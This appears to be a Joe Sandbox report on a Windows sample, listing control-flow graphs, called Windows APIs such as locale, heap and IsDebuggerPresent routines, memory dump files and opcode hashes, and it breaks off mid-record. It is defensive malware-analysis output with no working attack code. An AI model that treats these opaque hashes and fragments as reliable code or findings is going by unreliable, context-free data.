                                                                                  control_flow_graph 348 68c862-68c867 349 68c869-68c881 348->349 350 68c88f-68c898 349->350 351 68c883-68c887 349->351 353 68c8aa 350->353 354 68c89a-68c89d 350->354 351->350 352 68c889-68c88d 351->352 355 68c904-68c908 352->355 358 68c8ac-68c8b9 GetStdHandle 353->358 356 68c89f-68c8a4 354->356 357 68c8a6-68c8a8 354->357 355->349 359 68c90e-68c911 355->359 356->358 357->358 360 68c8bb-68c8bd 358->360 361 68c8e6-68c8f8 358->361 360->361 363 68c8bf-68c8c8 GetFileType 360->363 361->355 362 68c8fa-68c8fd 361->362 362->355 363->361 364 68c8ca-68c8d3 363->364 365 68c8db-68c8de 364->365 366 68c8d5-68c8d9 364->366 365->355 367 68c8e0-68c8e4 365->367 366->355 367->355
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0068C751,006A5BA0), ref: 0068C8AE
                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0068C751,006A5BA0), ref: 0068C8C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType
                                                                                  • String ID:
                                                                                  • API String ID: 3000768030-0
                                                                                  • Opcode ID: cef7775599e5801286948877681b1e3c4076c39a8dc68ff07a5ab8616f5fa080
                                                                                  • Instruction ID: b6eea4b67847296d47687fcb87c68f4559b8575e01e75e5aaba3f3e9b5807d1d
                                                                                  • Opcode Fuzzy Hash: cef7775599e5801286948877681b1e3c4076c39a8dc68ff07a5ab8616f5fa080
                                                                                  • Instruction Fuzzy Hash: 221103B16447414ACB306E3E8C88672BE97A796330B38075AD1B6D36F1C670E886D721

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(006A56B0,0000000C), ref: 00684948
                                                                                  • ExitThread.KERNEL32 ref: 0068494F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread
                                                                                  • String ID:
                                                                                  • API String ID: 1611280651-0
                                                                                  • Opcode ID: 2981286c6b623f06cc5c0e9aefe1d763bb9d46665a784ed3b3e8d7f50effc297
                                                                                  • Instruction ID: 0e6476225522dc24f3f6e82e14a5bee07690fb60c9a7a1efbf26f5ea3b0461dd
                                                                                  • Opcode Fuzzy Hash: 2981286c6b623f06cc5c0e9aefe1d763bb9d46665a784ed3b3e8d7f50effc297
                                                                                  • Instruction Fuzzy Hash: 4EF0AFB0940205AFDB10BFB0C80AA6E7B76EF42711F21424DF506972A2DF71A941CFA5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32 ref: 00671B98
                                                                                  • GetModuleFileNameA.KERNEL32 ref: 00671BB8
                                                                                    • Part of subcall function 00671860: CreateFileA.KERNELBASE ref: 006718E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModule$CreateHandleName
                                                                                  • String ID:
                                                                                  • API String ID: 2828212432-0
                                                                                  • Opcode ID: e0bdec3f52f82a0c21629b9ccdd5ad1249777169e4508942afe33339388bf6ed
                                                                                  • Instruction ID: 84a89f4a26cd2a33869891aba003b78d688439d51e7b3789fcc33957fe0f0e60
                                                                                  • Opcode Fuzzy Hash: e0bdec3f52f82a0c21629b9ccdd5ad1249777169e4508942afe33339388bf6ed
                                                                                  • Instruction Fuzzy Hash: B6F0F9B090420C8FCB50FF78E84529DBBF5AB45300F4185ADD489D7240EAB469888F86

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 393 68ad27-68ad30 394 68ad5f-68ad60 393->394 395 68ad32-68ad45 RtlFreeHeap 393->395 395->394 396 68ad47-68ad5e GetLastError call 686bfa call 686bb1 395->396 396->394
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,0068F0A4,?,00000000,?,?,0068ED44,?,00000007,?,?,0068F68A,?,?), ref: 0068AD3D
                                                                                  • GetLastError.KERNEL32(?,?,0068F0A4,?,00000000,?,?,0068ED44,?,00000007,?,?,0068F68A,?,?), ref: 0068AD48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 485612231-0
                                                                                  • Opcode ID: 88e31fa775128f9a692cf69e473ea63410cf9117636d6f4a56e50f656775b5ab
                                                                                  • Instruction ID: 46be39118a51589ecfb10a0bac737d75272a568e533e5fe28f88fac531f12b86
                                                                                  • Opcode Fuzzy Hash: 88e31fa775128f9a692cf69e473ea63410cf9117636d6f4a56e50f656775b5ab
                                                                                  • Instruction Fuzzy Hash: 3CE08631100204ABDB113BE4FC09B953B9AEF45759F144225FB09CA575DFB198608B88
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: 3c42d14018097d1d6f4c490966a9524d2d850aaaf43dae69fde1335827fc2583
                                                                                  • Instruction ID: 9db5f2b32fc19d34980e2b1af8beaf09f809349c2aa485d42ccfa1d8ffb159dd
                                                                                  • Opcode Fuzzy Hash: 3c42d14018097d1d6f4c490966a9524d2d850aaaf43dae69fde1335827fc2583
                                                                                  • Instruction Fuzzy Hash: CCC11574608341CFC744EF28D494A2ABBE2EF89354F00892DF99ACB391EB35D905CB46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8bdae05ce233b4db8b3042d1fbaca357cda5dc3b048a21382a0e95fae9f69de6
                                                                                  • Instruction ID: 16a36990c7c4efd81a2a833d0fdd1c1f6c130bf69e51e311776eaf61721c1744
                                                                                  • Opcode Fuzzy Hash: 8bdae05ce233b4db8b3042d1fbaca357cda5dc3b048a21382a0e95fae9f69de6
                                                                                  • Instruction Fuzzy Hash: 9541807291011AAFCF14DF68C8909EDB7FAFF09320B54812AE549E7740E735E945DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 06b6f9b1396755b813bf5cd5eb0ecf82d506522b83bb6baaf27b1a4c4ce9da4f
                                                                                  • Instruction ID: 77cc70622ba956e5b09c57936b5f7dc6dbc1c42709244d67c60cc69a55562d26
                                                                                  • Opcode Fuzzy Hash: 06b6f9b1396755b813bf5cd5eb0ecf82d506522b83bb6baaf27b1a4c4ce9da4f
                                                                                  • Instruction Fuzzy Hash: 9701B5336106159F9B12BF68EC4999B33AFBBC67A47286324F6218B554DB70AC018B94
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,0068CD3A,?,?,0068CD3A,00000220,?,00000000,?), ref: 0068AD93
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 6b55822db30f2a9d49307dab2b3a0f1e056ca8ad75f5a18ab91566ffb8a7df7a
                                                                                  • Instruction ID: 9ac6ab9d4844955ec504b1f3cf15277ea5646386c617bf7cb485336c67db8348
                                                                                  • Opcode Fuzzy Hash: 6b55822db30f2a9d49307dab2b3a0f1e056ca8ad75f5a18ab91566ffb8a7df7a
                                                                                  • Instruction Fuzzy Hash: F5E065311402115AF76136E59C01B9B369B9F427A2F294312AC05D6B90EF50DC0187E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "ti$"ti
                                                                                  • API String ID: 0-2860212937
                                                                                  • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                  • Instruction ID: fc7d49635ef18015c822bf88762ae147e97f4ad7372b1f72ebe7aeb326160e87
                                                                                  • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                  • Instruction Fuzzy Hash: 7B022D71E002199FDF14DFA9C9846EDB7B2FF48314F248269E519A7380D731AA41CB94
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0069016A
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006901A8
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 006901BB
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00690203
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0069021E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                  • String ID: `/j
                                                                                  • API String ID: 415426439-149791257
                                                                                  • Opcode ID: 308b5cd0c18f2b1db667afb72a802c5ad72d448a89814eb552d0466943aba5bc
                                                                                  • Instruction ID: 1f11625f467105f7a2c4da350eb7f3cc8a1b4bd0c3a4209abb94980fbc59e351
                                                                                  • Opcode Fuzzy Hash: 308b5cd0c18f2b1db667afb72a802c5ad72d448a89814eb552d0466943aba5bc
                                                                                  • Instruction Fuzzy Hash: 99517F71A00206AFFF10EFA5CC45AFE77BEAF45700F14452AE905E7691EBB09A40CB65
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: 2a8609a9275d808957ee5326c04f803070a0d622c47918a5be45e06a4d791b73
                                                                                  • Instruction ID: c5eb369a99eb2a5f7d85f31593ca591799718e98d280551bd071681f9f07ae83
                                                                                  • Opcode Fuzzy Hash: 2a8609a9275d808957ee5326c04f803070a0d622c47918a5be45e06a4d791b73
                                                                                  • Instruction Fuzzy Hash: B9D22A71E182298FDF65CE28DD407EAB7BAEB54304F1441EAE80DE7640DB74AE858F41
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00690198,00000002,00000000,?,?,?,00690198,?,00000000), ref: 00690860
                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00690198,00000002,00000000,?,?,?,00690198,?,00000000), ref: 00690889
                                                                                  • GetACP.KERNEL32(?,?,00690198,?,00000000), ref: 0069089E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: ccdb9c462406461aba87eb86cd13be2b7448d104036ca815f827901d5dd59f6c
                                                                                  • Instruction ID: 5b08a86e6a71c174d02c4fff0a38dc5fbd137bc7324b51e5cff21faf262cb7ef
                                                                                  • Opcode Fuzzy Hash: ccdb9c462406461aba87eb86cd13be2b7448d104036ca815f827901d5dd59f6c
                                                                                  • Instruction Fuzzy Hash: 91219A22B40101AEFF349F54CB01AE773AFAF90B64B668024E90AD7A14E732DE41C7D0
                                                                                  APIs
                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00690E99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 0b25afa2e652940fcf692e9a44cc442c8bb1f8a1fe57df7afecb270986999f7e
                                                                                  • Instruction ID: 8d84d1b279ccf537d33fa7b291e57975aff00e86f32b8a591f28cd04fe91f618
                                                                                  • Opcode Fuzzy Hash: 0b25afa2e652940fcf692e9a44cc442c8bb1f8a1fe57df7afecb270986999f7e
                                                                                  • Instruction Fuzzy Hash: A27101729451599FEF30AF28CC89AFEBBBEAF09300F1442DDE409A7611DA315E859F14
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0067E438
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0067E504
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0067E51D
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0067E527
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: 638dbd6d7710fb3ff6fc4e844cbb20473b6fa37b6bbd1cd9e4265472de1c8e82
                                                                                  • Instruction ID: 04d0eb133bafc9a296ec159a0cccd3b660463b56e89b2e4500560ef37ec0b859
                                                                                  • Opcode Fuzzy Hash: 638dbd6d7710fb3ff6fc4e844cbb20473b6fa37b6bbd1cd9e4265472de1c8e82
                                                                                  • Instruction Fuzzy Hash: 1231E775D0121C9BDB20EFA5D9497CDBBB8AF08304F1041EAE40CAB250EBB19A858F45
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006903A2
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006903EC
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006904B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 661929714-0
                                                                                  • Opcode ID: e65f5e4676c11abe8223515d28e5f0e3794ce78f282ea16e50489ed4343e1631
                                                                                  • Instruction ID: 948a3779d2e5aac05385a645f37f6bd261244afd7f5f6f54835a18660fce57ee
                                                                                  • Opcode Fuzzy Hash: e65f5e4676c11abe8223515d28e5f0e3794ce78f282ea16e50489ed4343e1631
                                                                                  • Instruction Fuzzy Hash: 39616D719501079FEF64EF24CD82BAA77AEEF04700F104169EE05C6A85EB74D981DF94
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006873F5
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006873FF
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0068740C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
